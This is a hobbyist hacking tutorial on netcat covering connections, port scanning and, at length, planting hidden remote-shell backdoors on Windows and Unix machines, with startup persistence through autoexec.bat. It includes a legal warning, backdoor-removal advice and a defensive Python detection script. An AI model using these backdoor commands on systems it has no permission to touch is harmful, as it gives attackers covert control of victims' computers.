GUIDE to (mostly) Harmless Hacking: HOW TO USE NETCAT
By Steven (Dist0rted) Welch with help from
If you haven't ever used netcat before, you're missing out on one of the greatest programs I've ever used for hacking. So just what is it? It's basically a buffed-up version of telnet with many options that let it do many things, which I'll try to cover in this article. Even better, it runs on Windows and Unix! Where can you get it? It was developed by the l0pht, which is now @stake, so you can get it there. There are also countless other sites out there that have netcat for download.
But before you read this guide, you should probably already know how to use telnet and write batch files, both of which can be located on the main GTMHH page. (Speaking of which, it's just best to read all of the GTMHH first.)
So, first off let's look at netcat as a telnet client. Here's how netcat works:
NOTE: From here on I'm assuming that Windows is installed onto drive C:. If it's something else like Z: then just change accordingly.
Obviously you're going to first download and install netcat. For Windows, get the right version and unzip it to whatever directory you like. Just make sure that you copy the nc.exe file to the C:\WINDOWS\System32 or C:\WINNT\System32 directory when on Windows NT/2000/XP. For 95/98/ME, copy it to C:\WINDOWS.
On UNIX, you'll need to get the appropriate version, unpack it, and then view the readme for install instructions.
Open up the command prompt for your system. For Windows, this will mean Start -> Programs -> Accessories -> MS-DOS Prompt or Start -> Programs -> MS-DOS Prompt or Start -> All Programs -> Accessories -> Command Prompt. For UNIX, you should already know how to get to it.
Now type the following command and hit the ENTER key:
nc <target> <port>
Here's how this will work:
nc - runs netcat
<target> - what IP or hostname to connect to
<port> - port to connect to on the IP or hostname
Here's an example:
nc 10.0.0.1 23
That would connect to 10.0.0.1 on port number 23.
It's just like using telnet but has many more features that I'll now cover.
Next, I'll discuss one of my favorite parts of the program: it allows you to set up backdoor ports on a compromised system. This is way easier than programming backdoors using sockets, and easier than editing inetd.conf entries. So how do you do it? Let's cover Windows NT/2000/XP first.
Get a copy of the nc.exe file into the target's C:\WINDOWS\System32\ directory and run the command "nc -L -d -p 2003 -t -e cmd.exe" (without the quotes). What did this do? It set up a backdoor that opens an MS-DOS shell whenever someone connects to port 2003. (So if you were to telnet to the victim's computer on port 2003, you would get a command prompt from which you have total control over the system.)
You can go to jail warning: Before you folks start emailing Steven Welch, pavethetrees or Carolyn Meinel asking "But HOW do I get the nc.exe file onto the victim computer?" take a deep breath. If you own the "victim" computer, fine, just install it! If it belongs to your boyfriend/girlfriend/friend/enemy/teacher, then you have to get permission to install it. If you don't have permission, you can go to jail! This Guide is so you can have fun using netcat LEGALLY, comprende?
How did it work? Here:
nc - ran netcat
-L - tells netcat to stay open and listen (set up a backdoor)
-d - tells netcat to detach (don't open up a window on the victim's computer when listening)
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-t - tells netcat to accept telnet connections
-e cmd.exe - tells netcat to open up cmd.exe (the MS-DOS shell) when connected to
How about Windows 95/98/ME? Do the exact same thing as you did with NT/2000/XP, except put the nc.exe file into the C:\WINDOWS\ directory, and when you run the command, change the end to "-e command.com" instead of "-e cmd.exe" so that you'll run the 95/98/ME MS-DOS shell.
In case you haven't noticed, if the target reboots the computer then the backdoor won't be running anymore. How can we fix this? Open up the file C:\autoexec.bat in a text editor by typing the command "edit \autoexec.bat" in your backdoor and add to the end of the file the command that you want to run when the computer starts ("nc -L -d -p 2003 -t -e cmd.exe" or whatever it is). Then save and exit.
Alright, we've got the backdoor working on Windows, but what about Unix? Install netcat on the target system (even though most systems come pre-installed with it). Then run the command "nc -nvv -l -p 2003 -e /bin/bash". If you ran the backdoor on Windows, then you should pretty well know how this works, but anyway:
nc - runs the netcat program
-nvv - the n part tells netcat not to do a DNS lookup on the address (numeric only), and vv means double verbose (output as much information as possible), while a single v means normal verbose (just output a little more information)
-l - tells netcat to stay open and listen
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-e /bin/bash - tells netcat to open up /bin/bash (one of the many Unix shells) when connected to (you could also choose /bin/sh, /bin/tcsh, etc. if you wish)
You may say, "When I run the command it just says command not recognized!" This is most likely because the directory you installed netcat to is not in the system path. You have three options: install netcat to a directory like /usr/local which is in the system path, set the system path to also include the directory that you installed netcat to, or just "cd" to the directory that you installed netcat to and include a "./" in front of the netcat command ("./nc -nvv -l -p 2003 -e /bin/bash").
Also, on some Unix systems the rpm version of netcat won't let you use the "-e" option - so you can't use backdoors with that. What you need to do is install the .tar.gz or .tgz version of netcat that will allow you to use "-e".
So now that you're having fun and impressing your friends with this new netcat backdoor, you get frustrated when you find out that you've been cracked and you think a netcat backdoor is running on your own system! "How do I get rid of this thing!?" Well, first I'd check C:\autoexec.bat for a netcat entry (or /etc/inetd.conf for Unix). If you find one, delete it and then find the process that's running the backdoor. This can be done by simply searching for "nc" or "nc.exe", but most likely the attacker will have renamed the file to something else, so look for the listen and -e options on the command line rather than the name. In Windows you can press CTRL + ALT + DEL and find a suspicious-looking process to terminate. On Unix you can use the "ps" command to find a process that's running a netcat backdoor. Beyond that, just use common sense for techniques that will eliminate the backdoor.
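As an added example (not part of the original guide), here is a small Python audit script that applies the checks above to constructed sample input: it scans startup-file lines (autoexec.bat, inetd.conf) and ps output for any command line carrying a listen flag (-l or -L) together with -e, keying on the flags rather than the binary name so that a renamed nc.exe does not slip through. The file contents, the process list and the renamed binary "svchost" are all constructed for the demo.

```python
# Constructed sample inputs (not taken from any real system): a few lines of
# autoexec.bat and inetd.conf plus some `ps` output. One autoexec line and two
# ps lines carry a netcat-style shell listener; one of those uses a renamed binary.
AUTOEXEC_BAT = """@ECHO OFF
PATH C:\\WINDOWS;C:\\WINDOWS\\COMMAND
nc -L -d -p 2003 -t -e cmd.exe
"""

INETD_CONF = """ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
"""

PS_OUTPUT = """  PID TTY      STAT   TIME COMMAND
  412 ?        Ss     0:00 /usr/sbin/sshd
  917 pts/0    S      0:00 ./nc -nvv -l -p 2003 -e /bin/bash
  932 pts/0    S      0:00 /usr/local/bin/svchost -l -p 4444 -e /bin/sh
"""


def netcat_listener(cmdline):
    """Return {'port', 'exec'} if the command line looks like a netcat listener
    that hands out a program (a listen flag -l/-L plus a standalone -e <prog>),
    otherwise None. Clustered flags such as -nvv are split into letters;
    tokens like -w2 (letters mixed with digits) are ignored."""
    tokens = cmdline.split()
    letters, exec_prog, port = set(), None, None
    for i, tok in enumerate(tokens):
        if not (tok.startswith("-") and tok[1:].isalpha()):
            continue
        letters.update(tok[1:])
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok[1:] == "e" and nxt:
            exec_prog = nxt
        elif tok[1:] == "p" and nxt and nxt.isdigit():
            port = int(nxt)
    if exec_prog and letters & {"l", "L"}:
        return {"port": port, "exec": exec_prog}
    return None


def scan_text(text, source):
    """Check each line of a file or command listing; report hits with origin."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        info = netcat_listener(line)
        if info:
            hits.append({"source": source, "line": lineno, "cmd": line.strip(), **info})
    return hits


def audit(autoexec=AUTOEXEC_BAT, inetd=INETD_CONF, ps=PS_OUTPUT):
    """Run the guide's three checks (autoexec.bat, inetd.conf, ps) in one pass."""
    return scan_text(autoexec, "autoexec.bat") + scan_text(inetd, "inetd.conf") + scan_text(ps, "ps")


if __name__ == "__main__":
    for hit in audit():
        print(f"{hit['source']}:{hit['line']} port={hit['port']} exec={hit['exec']}  {hit['cmd']}")
```

On a live system you would feed it the real files and `ps ax` output; the inetd.conf sample produces no hit because its entries carry no netcat flags.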
Now that I've gotten done with the backdoor side of netcat, let's discuss port scanning with netcat. Netcat doesn't have any stealth options, but it does a full connect to each port and, after a specified timeout, it will disconnect and move on to the next port. Here's how it works:
nc -z -w2 0.0.0.0 1-6000
nc - runs netcat
-z - tells netcat to run a portscan
-w2 - tells netcat the timeout after which to give up on a port and move to the next one - here it's 2 seconds
0.0.0.0 - the target IP address - this is where you put the target IP or hostname
1-6000 - tells netcat the range of ports to scan - here it was port 1 to 6000
If you want, you can add the option -v or -vv to see more of what's going on in netcat.
Here's an example of a portscan:
nc -vv -z -w2 10.0.0.1 1-6000
Basically, the port scanning is very simple to understand, so there's no big long explanation or anything.
Well, this ends my guide to netcat. I hope you learned everything here. Go ahead and play around with netcat - it's my favorite tool that I've ever used (besides of course those lovely network sniffers...). If you ever need help, feel free to e-mail me.
Why do we freely give out information that even the total beginner may use as a two-edged sword of cyberspace power? We do this "to turn over to mankind at large the greatest possible power to control the world and deal with it according to its lights and values." -- Robert J. Oppenheimer, head of the Manhattan Project, which created the world's first nuclear weapons.